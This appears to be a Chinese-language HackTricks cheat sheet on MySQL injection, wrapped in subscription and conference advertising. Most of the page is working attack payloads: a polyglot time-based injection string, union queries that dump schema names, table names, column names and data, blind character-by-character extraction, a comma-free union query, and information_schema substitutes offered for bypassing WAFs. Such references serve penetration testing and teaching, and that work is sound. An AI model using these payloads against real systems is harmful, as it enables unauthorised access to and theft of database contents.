MySQL injection

从零开始学习AWS黑客技术，成为专家 htARTE（HackTricks AWS红队专家）！

您在网络安全公司工作吗？想要看到您的公司在HackTricks中做广告？或者想要访问PEASS的最新版本或下载HackTricks的PDF？请查看订阅计划!
发现我们的独家NFTs收藏品The PEASS Family
获取官方PEASS＆HackTricks周边
加入 💬 Discord群组 或 电报群组 或 在Twitter上 🐦@carlospolopm上关注我。
通过向hacktricks repo和hacktricks-cloud repo提交PR来分享您的黑客技巧。

RootedCON是西班牙最重要的网络安全活动之一，也是欧洲最重要的之一。作为促进技术知识的使命，这个大会是技术和网络安全专业人士在各个领域的热点会议。

-- MYSQL Comment
# MYSQL Comment
/* MYSQL Comment */
/*! MYSQL Special SQL */
/*!32302 10*/ Comment for MySQL version 3.23.02

有趣的函数

确认Mysql:

concat('a','b')
database()
version()
user()
system_user()
@@version
@@datadir
rand()
floor(2.9)
length(1)
count(1)

有用的函数

SELECT hex(database())
SELECT conv(hex(database()),16,10) # Hexadecimal -> Decimal
SELECT DECODE(ENCODE('cleartext', 'PWD'), 'PWD')# Encode() & decpde() returns only numbers
SELECT uncompress(compress(database())) #Compress & uncompress() returns only numbers
SELECT replace(database(),"r","R")
SELECT substr(database(),1,1)='r'
SELECT substring(database(),1,1)=0x72
SELECT ascii(substring(database(),1,1))=114
SELECT database()=char(114,101,120,116,101,115,116,101,114)
SELECT group_concat(<COLUMN>) FROM <TABLE>
SELECT group_concat(if(strcmp(table_schema,database()),table_name,null))
SELECT group_concat(CASE(table_schema)When(database())Then(table_name)END)
strcmp(),mid(),,ldap(),rdap(),left(),rigth(),instr(),sleep()

所有注入

SELECT * FROM some_table WHERE double_quotes = "IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/"

从https://labs.detectify.com/2013/05/29/the-ultimate-sql-injection-payload/

流程

请记住，在“现代”版本的MySQL中，您可以将“information_schema.tables”替换为“mysql.innodb_table_stats”（这可能对绕过WAFs有用）。

SELECT table_name FROM information_schema.tables WHERE table_schema=database();#Get name of the tables
SELECT column_name FROM information_schema.columns WHERE table_name="<TABLE_NAME>"; #Get name of the columns of the table
SELECT <COLUMN1>,<COLUMN2> FROM <TABLE_NAME>; #Get values
SELECT user FROM mysql.user WHERE file_priv='Y'; #Users with file privileges

仅有1个值

group_concat()
Limit X,1

逐个盲注

substr(version(),X,1)='r' 或 substring(version(),X,1)=0x70 或 ascii(substr(version(),X,1))=112
mid(version(),X,1)='5'

盲注添加

LPAD(version(),1...lenght(version()),'1')='asd'...
RPAD(version(),1...lenght(version()),'1')='asd'...
SELECT RIGHT(version(),1...lenght(version()))='asd'...
SELECT LEFT(version(),1...lenght(version()))='asd'...
SELECT INSTR('foobarbar', 'fo...')=1

检测列数

使用简单的ORDER

order by 1
order by 2
order by 3
...
order by XXX

UniOn SeLect 1
UniOn SeLect 1,2
UniOn SeLect 1,2,3
...

基于MySQL的Union注入

MySQL的Union注入是一种常见的SQL注入技术，通过在SQL查询中使用UNION操作符来合并两个查询的结果。攻击者可以利用Union注入来检索数据库中的敏感信息，甚至执行恶意操作。

UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,schema_name,0x7c)+fRoM+information_schema.schemata
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,table_name,0x7C)+fRoM+information_schema.tables+wHeRe+table_schema=...
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,column_name,0x7C)+fRoM+information_schema.columns+wHeRe+table_name=...
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,data,0x7C)+fRoM+...

SSRF

在这里学习不同的选项 滥用 Mysql 注入以获得 SSRF。

WAF bypass tricks

Information_schema alternatives

请记住，在“现代”版本的 MySQL 中，您可以将 information_schema.tables 替换为 mysql.innodb_table_stats 或 sys.x$schema_flattened_keys_ 或 sys.schema_table_statistics

MySQLinjection without COMMAS

选择 2 列而不使用任何逗号 (https://security.stackexchange.com/questions/118332/how-make-sql-select-query-without-comma):

-1' union select * from (select 1)UT1 JOIN (SELECT table_name FROM mysql.innodb_table_stats)UT2 on 1=1#

在不知道列名的情况下检索数值

如果您知道表的名称但不知道表内列的名称，您可以尝试执行类似以下内容来查找有多少列：

# When a True is returned, you have found the number of columns
select (select "", "") = (SELECT * from demo limit 1);     # 2columns
select (select "", "", "") < (SELECT * from demo limit 1); # 3columns

假设有2列（第一列是ID），另一列是标志，您可以尝试逐个字符地暴力破解标志的内容：

# When True, you found the correct char and can start ruteforcing the next position
select (select 1, 'flaf') = (SELECT * from demo limit 1);

MySQL历史

您可以在MySQL中查看其他执行情况，读取表：sys.x$statement_analysis

可选版本

mysql> select @@innodb_version;
mysql> select @@version;
mysql> select version();

其他MYSQL注入指南

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MySQL%20Injection.md]

参考资料

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MySQL%20Injection.md

RootedCON 是西班牙最重要的网络安全活动之一，也是欧洲最重要的之一。作为促进技术知识的使命，这个大会是技术和网络安全专业人士在各个领域的热点会议。

RootedCONRootedCON

从零开始学习AWS黑客技术，成为专家 htARTE (HackTricks AWS Red Team Expert)!

您在网络安全公司工作吗？想要在HackTricks中看到您的公司广告？或者想要访问PEASS的最新版本或下载HackTricks的PDF？请查看订阅计划!
发现PEASS Family，我们的独家NFTs收藏品
获取官方PEASS & HackTricks周边产品
加入 💬 Discord群 或 电报群 或在Twitter上关注我 🐦@carlospolopm.
通过向hacktricks repo和hacktricks-cloud repo提交PR来分享您的黑客技巧。

上一页MSSQL Injection 下一页MySQL File priv to SSRF/RCE

最后更新于3个月前

评论